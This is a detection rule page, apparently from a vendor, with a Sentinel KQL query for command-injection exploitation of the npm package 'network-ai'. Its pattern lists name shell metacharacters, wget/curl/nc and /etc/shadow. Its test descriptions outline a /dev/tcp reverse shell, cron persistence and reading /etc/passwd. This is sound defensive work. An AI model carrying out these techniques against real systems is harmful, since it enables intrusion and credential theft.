Detect CVE-2026-54051: network-ai npm Package OS Command Injection in Microsoft Sentinel
Detects exploitation of CVE-2026-54051, a critical OS command injection vulnerability (CWE-78) in the npm package 'network-ai' versions prior to 5.9.1. Improper neutralization of special elements allows attackers to inject arbitrary OS commands through the package's API, potentially leading to full system compromise. A public PoC is available.
MITRE ATT&CK
KQL Detection Query
let SuspiciousProcesses = dynamic(['cmd.exe', 'powershell.exe', 'sh', 'bash', 'dash', 'zsh', 'ksh']);
let CommandInjectionPatterns = dynamic([';', '&&', '||', '`', '$(', '|', '>', '<', '%0a', '%0d']);
DeviceProcessEvents
| where TimeGenerated >= ago(24h)
| where InitiatingProcessFileName =~ 'node.exe' or InitiatingProcessCommandLine has 'network-ai'
| where FileName in~ (SuspiciousProcesses)
| where ProcessCommandLine has_any (CommandInjectionPatterns)
| project TimeGenerated, DeviceId, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, FolderPath
| extend RiskScore = case(
ProcessCommandLine has_any (dynamic(['wget', 'curl', 'nc', 'ncat', 'python', 'perl', 'ruby'])), 'Critical',
ProcessCommandLine has_any (dynamic(['/etc/passwd', '/etc/shadow', 'whoami', 'id', 'net user'])), 'High',
'Medium'
)
| order by TimeGenerated descDetects child processes spawned by Node.js that match OS command injection patterns associated with CVE-2026-54051 exploitation of the network-ai npm package.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate Node.js scripts that invoke shell commands for system administration
- CI/CD pipelines running node-based build scripts with shell exec calls
- Security tooling or monitoring agents built on Node.js that call system commands
- Developer workstations running network diagnostics tools built on network-ai
Other platforms for CVE-2026-54051
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1CVE-2026-54051 Basic Command Injection via network-ai
Expected signal: Process creation event: node spawns sh or bash child process with command line containing 'whoami'; file creation event for /tmp/cve_2026_54051_poc.txt
- Test 2CVE-2026-54051 Reverse Shell Injection Simulation
Expected signal: Process creation: node → bash with command containing /dev/tcp; network connection event from bash process to 127.0.0.1:4444
- Test 3CVE-2026-54051 Persistence via Cron Injection
Expected signal: Process creation: node → sh → crontab with new entry; crontab file modification event; subsequent periodic execution of /tmp/beacon.sh if not cleaned up
- Test 4CVE-2026-54051 Credential Harvesting via /etc/passwd Read
Expected signal: Process creation: node → sh with 'cat /etc/passwd' in command line; file read event on /etc/passwd by shell child process of Node.js; file creation of /tmp/passwd_exfil.txt
Unlock Pro Content
Get the full detection package for CVE-2026-54051 including response playbook, investigation guide, and atomic red team tests.